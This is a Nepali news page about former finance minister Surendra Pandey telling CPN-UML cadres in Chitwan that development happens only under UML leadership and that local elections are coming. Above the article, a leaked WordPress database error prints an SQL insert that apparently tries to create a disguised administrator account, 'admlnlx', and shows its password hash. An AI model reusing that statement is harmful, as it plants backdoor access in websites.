WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B8J8FhYB/JdFUpUYy2O7C.p5HKipeg0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-06 12:41:30', '', 'admlnlx', 'admlnlx')
अनुज न्यौपाने,
चितवन माघ २१-
नेकपा एमालेका नेता तथा पुर्व अर्थमन्त्री सुरेन्द्र पाण्डेले एमालेका नेतृत्वमा मात्र विकास निर्माण सम्भव भएको वताउनु भएको छ ।उहांले एमालेको नौ महिने सरकारले गरेका कामका कारण जनताले विस्वास गर्ने आधार वनेको वताउनु भयो । एमाले कालिका नगरपालिका ७ चितवनले आज आयोजना गरेको वनभोज तथा कार्यकर्ता प्रशिक्षण कार्यक्रममा बोल्दै नेता पाण्डेले एमालेले अव बिकास निर्माणलाई प्रमुख मुद्धा वनाउने जानाकारी दिनुभयो ।
कुनैपनि हालतमा देशमा स्थानिय निकाएको निर्वाचन हुने भन्दै उहांले त्यसका लागी तयार रहन कार्यकर्तालाई निर्देशन दिनुभयो ।एमाले प्रति वढेको जनलहरका कारण अन्य दल छट्पटाएको समेत नेता पाण्डेले आरोप लगाउनु भयो ।